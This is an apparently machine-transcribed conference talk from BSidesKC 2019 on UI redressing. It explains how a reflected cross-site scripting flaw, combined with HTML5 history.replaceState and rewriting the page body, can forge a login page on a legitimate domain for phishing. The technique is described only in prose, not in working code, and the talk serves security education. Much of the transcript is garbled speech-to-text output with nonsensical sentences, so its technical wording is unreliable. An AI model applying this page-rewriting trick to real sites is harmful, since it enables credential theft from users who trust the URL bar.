BSidesKC 2019 - Travis Lowe - UI Redressing, Moving Beyond alert('xss')

maybe all work we're nearing the end of this journey of obsessions I appreciate appreciate also hang out there on a beautiful Saturday introduce Trevor's love these these all things Microsoft apparently that's a fantastic insecurity for about ten years

so today we're gonna talk about tricking us

you have an axe

cross-site scripting the UI redressing we really need but it's really dangerous but that's where it in my opinion really should be but maybe you come across the site that has a crossroads with new entrance brochures there's no login there's no request be made like that the process doesn't make sense so I like telling stories

we've done the story that I tell the narrative that I could tell that that is I love Sydney important people react to it this comes into play because you know in the woodbox finding you know what does that be no one's gonna really connect what that means dr. Murdoch cookie sure if you know you don't have to the session protected by you only sure that that could be dire we can show that but you're an order box

whiskey's repo for old things and I came across the tiny snippet here for you I'd redressing and it was just a script thing here never seen it before I was like huh what's that

so html5 gives these two wonderful things history dr. place today and history push stick so what they do is in practice the history replaced date and you normal and you that slash slash slash slash three of those European stop sucking each is like correctly reversal you're just swinging it all the way back after Rudy the website in taking blog Biersack blog in a real world the reason this is used is to almost like a little placeholder so if you had a gallery website like injuries like that you're putting all these photos they can change your URL are on the top that be so we had like the DC Universe yeah picture Batman with Batman became to do or say Batman

Joker Joker just better user experience perhaps so if you have a trip text

stated a little bit I say uploading it not even entirely URL encoding it we're gonna stick so we better do what we do second so we've got demoed up besides when we've got warm up

[Music]

alright alright they're gonna be science form parent you know so down here you see you in yeah it's almost like this really simple there's no security here whatsoever

all right so we've got sickening pair and better strip here no no no login and we just remember URL bar like lovely so from a fishing standpoint this is really anything because you just rewritten as the show logins did you know whatever

weird because this page doesn't you it won't work because it doesn't exist so it's kind of a tent over your quad light space that you're in because you are technically just on the user but there's nothing that really exists anywhere you Simon Donald all right

for you so you do that in the parameters the title the title parameter allows title page so we've got you your LRH we change the title holiness and then the brothers for you so it's there maybe it'll work maybe you want in your element to be some limitations with it it's worth

that's kind of all but all right so document that body that entries you know this is just standard JavaScript what do we can take the document website body tag their HTML right do whatever we want so we can take our sip tag here and say doc why are you here sinner please login when we pair here third place take we now have two things combined and you completely rewritten the website

the type of oil derricks at work for a long time

all right so back here

we were a little now we haven't gone yet

now three you guys name would have besides login login for just like that imagine if you just style this match the same thing certificate a giant group of URL which this your house when I pulled off a wire terrible real URL so do all the people who don't use for a living we've trained in the look the URL here but he required sometimes my compartment degrading

so this is an email that you get that simple link which we already talked about

/ - here the one time female it's just a simple catcher that does a better refresh I caused it and slow it down just standard

[Music]

but we've got one which makes it a legitimate URL anything about the regular people look into Wrigley basically everyone not us you come into things when they go to page we're gonna text your tickets out they're gonna look for the comm it seems that Oh honestly that's what I'm gonna check for and if it looks like a login talk through some other perform problems and gave me to walk in or sign into Gmail or sign in with Facebook yeah Network you know telling that story to be scary because this is just reflect across that scripture it's not prepared anything else to read the word box whoo but we're taking in the word box by the

entire website so there's everything convinient scripting which is easier because really hard every time I go to go off site go through evasions I learned something new that I along and there's always a [Music]

everyone reject me I'm on Twitter questions

No [Music]

[Applause]

you